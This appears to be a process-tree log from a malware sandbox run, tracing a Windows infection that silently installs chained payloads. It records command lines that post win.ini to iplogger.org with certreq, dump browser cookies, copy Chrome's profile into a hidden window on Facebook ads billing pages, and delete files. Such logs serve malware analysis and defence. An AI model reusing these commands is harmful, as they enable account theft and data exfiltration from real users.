C:\Users\Admin\AppData\Local\Temp\is-UCJJB.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UCJJB.tmp\Delta.tmp" /SL5="$20934,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-DH08H.tmp\Delta.exe" /Verysilent
13⤵
PID:9720

C:\Users\Admin\AppData\Local\Temp\is-P5BI2.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-P5BI2.tmp\Setup.exe" /VERYSILENT
14⤵
- Checks processor information in registry
PID:9924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-P5BI2.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
15⤵
PID:5620

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
16⤵
- Kills process with taskkill
PID:8116

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
16⤵
- Delays execution with timeout.exe
PID:2100

C:\Users\Admin\AppData\Local\Temp\is-DH08H.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-DH08H.tmp\zznote.exe" /Verysilent
12⤵
PID:10040

C:\Users\Admin\AppData\Local\Temp\is-M3BPL.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M3BPL.tmp\zznote.tmp" /SL5="$30934,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-DH08H.tmp\zznote.exe" /Verysilent
13⤵
PID:10004

C:\Users\Admin\AppData\Local\Temp\is-22KCM.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-22KCM.tmp\jg4_4jaa.exe" /silent
14⤵
PID:8348

C:\Users\Admin\AppData\Local\Temp\is-DH08H.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-DH08H.tmp\hjjgaa.exe" /Verysilent
12⤵
PID:9812

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:8752

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:7052

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:9296

C:\Users\Admin\AppData\Local\Temp\zqoys1hqepp\iez0muuk1qr.exe
"C:\Users\Admin\AppData\Local\Temp\zqoys1hqepp\iez0muuk1qr.exe" /ustwo INSTALL
8⤵
PID:5020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 652
9⤵
- Program crash
PID:4448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 664
9⤵
- Program crash
PID:8300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 768
9⤵
- Program crash
PID:7300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 816
9⤵
- Program crash
PID:1968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 884
9⤵
- Program crash
PID:8644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 972
9⤵
- Program crash
PID:9556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 1180
9⤵
- Program crash
PID:9804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 1224
9⤵
- Program crash
PID:9912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 1296
9⤵
- Program crash
PID:10008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 1276
9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:10056

C:\Users\Admin\AppData\Local\Temp\rhpuig2nywn\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\rhpuig2nywn\chashepro3.exe" /VERYSILENT
8⤵
PID:8960

C:\Users\Admin\AppData\Local\Temp\is-0PR4F.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0PR4F.tmp\chashepro3.tmp" /SL5="$706B8,2012497,58368,C:\Users\Admin\AppData\Local\Temp\rhpuig2nywn\chashepro3.exe" /VERYSILENT
9⤵
- Drops file in Program Files directory
PID:7172

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
10⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:696

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
10⤵
- Checks computer location settings
PID:2992

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
10⤵
PID:7844

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
11⤵
PID:5296

C:\Program Files (x86)\JCleaner\Brava.exe
"C:\Program Files (x86)\JCleaner\Brava.exe"
10⤵
PID:1104

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
10⤵
- Suspicious use of SetThreadContext
PID:5132

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
11⤵
PID:5048

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
11⤵
PID:5604

C:\Program Files (x86)\JCleaner\8.exe
"C:\Program Files (x86)\JCleaner\8.exe"
10⤵
PID:8324

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo grYNxrw
11⤵
PID:6372

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys
11⤵
PID:1324

C:\Windows\SysWOW64\cmd.exe
cmd
12⤵
PID:8840

C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
Fai.com Far.xlt
13⤵
PID:9964

C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
14⤵
PID:9004

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 30
13⤵
- Runs ping.exe
PID:8624

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
10⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:6688

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1EaGq7"
10⤵
- Checks computer location settings
PID:4168

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
10⤵
PID:7552

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
11⤵
PID:5904

C:\Users\Admin\AppData\Local\Temp\vvsul1uko4x\vict.exe
"C:\Users\Admin\AppData\Local\Temp\vvsul1uko4x\vict.exe" /VERYSILENT /id=535
8⤵
PID:9564

C:\Users\Admin\AppData\Local\Temp\is-SD0J1.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SD0J1.tmp\vict.tmp" /SL5="$1B0986,870426,780800,C:\Users\Admin\AppData\Local\Temp\vvsul1uko4x\vict.exe" /VERYSILENT /id=535
9⤵
PID:4860

C:\Users\Admin\AppData\Local\Temp\is-P7MMB.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-P7MMB.tmp\wimapi.exe" 535
10⤵
PID:9708

C:\Users\Admin\AppData\Local\Temp\acarny01qg2\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\acarny01qg2\askinstall24.exe"
8⤵
PID:8760

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:9124

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:9416

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y
9⤵
PID:10288

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
9⤵
PID:10696

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xf0,0xf4,0xf8,0xc8,0xfc,0x7ffb56296e00,0x7ffb56296e10,0x7ffb56296e20
10⤵
PID:10704

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,9888335370268798416,2949084694865824663,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1656 /prefetch:8
10⤵
PID:10888

C:\Users\Admin\AppData\Local\Temp\25fqxfd4c03\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\25fqxfd4c03\Setup3310.exe" /Verysilent /subid=577
8⤵
PID:5232

C:\Users\Admin\AppData\Local\Temp\is-3FMRJ.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3FMRJ.tmp\Setup3310.tmp" /SL5="$2098A,802346,56832,C:\Users\Admin\AppData\Local\Temp\25fqxfd4c03\Setup3310.exe" /Verysilent /subid=577
9⤵
PID:5104

C:\Users\Admin\AppData\Local\Temp\is-4D3RU.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-4D3RU.tmp\Setup.exe" /Verysilent
10⤵
PID:10308

C:\Users\Admin\AppData\Local\Temp\is-NM1I5.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NM1I5.tmp\Setup.tmp" /SL5="$1D07F6,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-4D3RU.tmp\Setup.exe" /Verysilent
11⤵
PID:10348

C:\Users\Admin\AppData\Local\Temp\is-MH89V.tmp\ProPlugin.exe
"C:\Users\Admin\AppData\Local\Temp\is-MH89V.tmp\ProPlugin.exe" /Verysilent
12⤵
PID:10392

C:\Users\Admin\AppData\Local\Temp\is-EQLAS.tmp\ProPlugin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EQLAS.tmp\ProPlugin.tmp" /SL5="$D06E2,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-MH89V.tmp\ProPlugin.exe" /Verysilent
13⤵
PID:4908

C:\Users\Admin\AppData\Local\Temp\is-V77N1.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-V77N1.tmp\Setup.exe"
14⤵
PID:10616

C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"
15⤵
PID:10664

C:\Users\Admin\AppData\Local\Temp\is-MH89V.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-MH89V.tmp\Delta.exe" /Verysilent
12⤵
PID:5336

C:\Users\Admin\AppData\Local\Temp\is-DUDDH.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DUDDH.tmp\Delta.tmp" /SL5="$E06E2,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-MH89V.tmp\Delta.exe" /Verysilent
13⤵
PID:8744

C:\Users\Admin\AppData\Local\Temp\is-5IGBF.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-5IGBF.tmp\Setup.exe" /VERYSILENT
14⤵
PID:1328

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-5IGBF.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
15⤵
PID:9852

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
16⤵
- Kills process with taskkill
PID:10652

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
16⤵
- Delays execution with timeout.exe
PID:10584

C:\Users\Admin\AppData\Local\Temp\is-MH89V.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-MH89V.tmp\zznote.exe" /Verysilent
12⤵
PID:4036

C:\Users\Admin\AppData\Local\Temp\is-ICEMV.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ICEMV.tmp\zznote.tmp" /SL5="$240986,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-MH89V.tmp\zznote.exe" /Verysilent
13⤵
PID:8648

C:\Users\Admin\AppData\Local\Temp\is-OJE8J.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-OJE8J.tmp\jg4_4jaa.exe" /silent
14⤵
- Checks computer location settings
PID:9476

C:\Users\Admin\AppData\Local\Temp\is-MH89V.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-MH89V.tmp\hjjgaa.exe" /Verysilent
12⤵
PID:10472

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:9580

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:60

C:\Users\Admin\AppData\Local\Temp\h1wm3aisf2b\vs05w2i3aix.exe
"C:\Users\Admin\AppData\Local\Temp\h1wm3aisf2b\vs05w2i3aix.exe" /ustwo INSTALL
8⤵
PID:2484

C:\Users\Admin\AppData\Local\Temp\vgpl1ud42cm\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\vgpl1ud42cm\chashepro3.exe" /VERYSILENT
8⤵
PID:2808

C:\Users\Admin\AppData\Local\Temp\is-T0UA7.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-T0UA7.tmp\chashepro3.tmp" /SL5="$409F4,2012497,58368,C:\Users\Admin\AppData\Local\Temp\vgpl1ud42cm\chashepro3.exe" /VERYSILENT
9⤵
PID:9536

C:\Program Files (x86)\JCleaner\8.exe
"C:\Program Files (x86)\JCleaner\8.exe"
10⤵
PID:8460

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo grYNxrw
11⤵
PID:4012

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys
11⤵
PID:10112

C:\Windows\SysWOW64\cmd.exe
cmd
12⤵
PID:10340

C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
Fai.com Far.xlt
13⤵
PID:9696

C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
14⤵
PID:9532

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 30
13⤵
- Runs ping.exe
PID:10604

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
10⤵
PID:1620

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1EaGq7"
10⤵
PID:8512

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
10⤵
PID:4544

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
11⤵
PID:2248

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
10⤵
PID:8380

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
11⤵
PID:10264

C:\Program Files (x86)\JCleaner\Brava.exe
"C:\Program Files (x86)\JCleaner\Brava.exe"
10⤵
PID:9020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
10⤵
PID:7184

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
10⤵
PID:1896

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
10⤵
PID:2972

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
11⤵
PID:8824

C:\Users\Admin\AppData\Local\Temp\53gkk4e3t5b\wiqb4kdtkq4.exe
"C:\Users\Admin\AppData\Local\Temp\53gkk4e3t5b\wiqb4kdtkq4.exe" /ustwo INSTALL
8⤵
PID:10644

C:\Users\Admin\AppData\Local\Temp\pnurtqceows\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\pnurtqceows\Setup3310.exe" /Verysilent /subid=577
8⤵
PID:11260

C:\Users\Admin\AppData\Local\Temp\is-AJ747.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AJ747.tmp\Setup3310.tmp" /SL5="$650812,802346,56832,C:\Users\Admin\AppData\Local\Temp\pnurtqceows\Setup3310.exe" /Verysilent /subid=577
9⤵
PID:8296

C:\Users\Admin\AppData\Local\Temp\is-5DG33.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-5DG33.tmp\Setup.exe" /Verysilent
10⤵
PID:10128

C:\Users\Admin\AppData\Local\Temp\is-3D1K1.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3D1K1.tmp\Setup.tmp" /SL5="$50A2C,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-5DG33.tmp\Setup.exe" /Verysilent
11⤵
PID:10296

C:\Users\Admin\AppData\Local\Temp\is-UK3B1.tmp\ProPlugin.exe
"C:\Users\Admin\AppData\Local\Temp\is-UK3B1.tmp\ProPlugin.exe" /Verysilent
12⤵
PID:7680

C:\Users\Admin\AppData\Local\Temp\is-OVBS4.tmp\ProPlugin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OVBS4.tmp\ProPlugin.tmp" /SL5="$20BE8,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-UK3B1.tmp\ProPlugin.exe" /Verysilent
13⤵
PID:10680

C:\Users\Admin\AppData\Local\Temp\is-T59DC.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-T59DC.tmp\Setup.exe"
14⤵
PID:9732

C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"
15⤵
PID:6180

C:\Users\Admin\AppData\Local\Temp\is-UK3B1.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-UK3B1.tmp\Delta.exe" /Verysilent
12⤵
PID:3400

C:\Users\Admin\AppData\Local\Temp\is-20H1L.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-20H1L.tmp\Delta.tmp" /SL5="$30BE8,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-UK3B1.tmp\Delta.exe" /Verysilent
13⤵
PID:9588

C:\Users\Admin\AppData\Local\Temp\is-NBE73.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-NBE73.tmp\Setup.exe" /VERYSILENT
14⤵
PID:10196

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-NBE73.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
15⤵
PID:8952

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
16⤵
PID:9656

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
16⤵
- Kills process with taskkill
PID:860

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
16⤵
- Delays execution with timeout.exe
PID:8948

C:\Users\Admin\AppData\Local\Temp\is-UK3B1.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-UK3B1.tmp\zznote.exe" /Verysilent
12⤵
PID:10404

C:\Users\Admin\AppData\Local\Temp\is-LI17F.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LI17F.tmp\zznote.tmp" /SL5="$30BEA,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-UK3B1.tmp\zznote.exe" /Verysilent
13⤵
PID:10216

C:\Users\Admin\AppData\Local\Temp\is-VVNQ6.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-VVNQ6.tmp\jg4_4jaa.exe" /silent
14⤵
PID:10892

C:\Users\Admin\AppData\Local\Temp\is-UK3B1.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-UK3B1.tmp\hjjgaa.exe" /Verysilent
12⤵
PID:2092

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:9944

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:9392

C:\Users\Admin\AppData\Local\Temp\xayg0mwwt2r\vict.exe
"C:\Users\Admin\AppData\Local\Temp\xayg0mwwt2r\vict.exe" /VERYSILENT /id=535
8⤵
PID:10072

C:\Users\Admin\AppData\Local\Temp\is-C19GG.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-C19GG.tmp\vict.tmp" /SL5="$4609F2,870426,780800,C:\Users\Admin\AppData\Local\Temp\xayg0mwwt2r\vict.exe" /VERYSILENT /id=535
9⤵
PID:5312

C:\Users\Admin\AppData\Local\Temp\is-IJ3R9.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-IJ3R9.tmp\wimapi.exe" 535
10⤵
PID:10980

C:\Users\Admin\AppData\Local\Temp\jygfjvatf4x\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\jygfjvatf4x\askinstall24.exe"
8⤵
PID:9920

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:4972

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:9652

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y
9⤵
PID:9636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
9⤵
PID:9872

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffb51576e00,0x7ffb51576e10,0x7ffb51576e20
10⤵
PID:3788

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,2265873176109268348,2307714243205901773,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1700 /prefetch:8
10⤵
PID:10464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,2265873176109268348,2307714243205901773,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1636 /prefetch:2
10⤵
PID:9308

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,2265873176109268348,2307714243205901773,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2216 /prefetch:8
10⤵
PID:3676

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,2265873176109268348,2307714243205901773,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2696 /prefetch:1
10⤵
PID:5984

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,2265873176109268348,2307714243205901773,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2688 /prefetch:1
10⤵
PID:9444

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,2265873176109268348,2307714243205901773,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
10⤵
PID:7960

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,2265873176109268348,2307714243205901773,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3096 /prefetch:1
10⤵
PID:7360

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,2265873176109268348,2307714243205901773,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:1
10⤵
PID:3288

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,2265873176109268348,2307714243205901773,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3084 /prefetch:1
10⤵
PID:9280

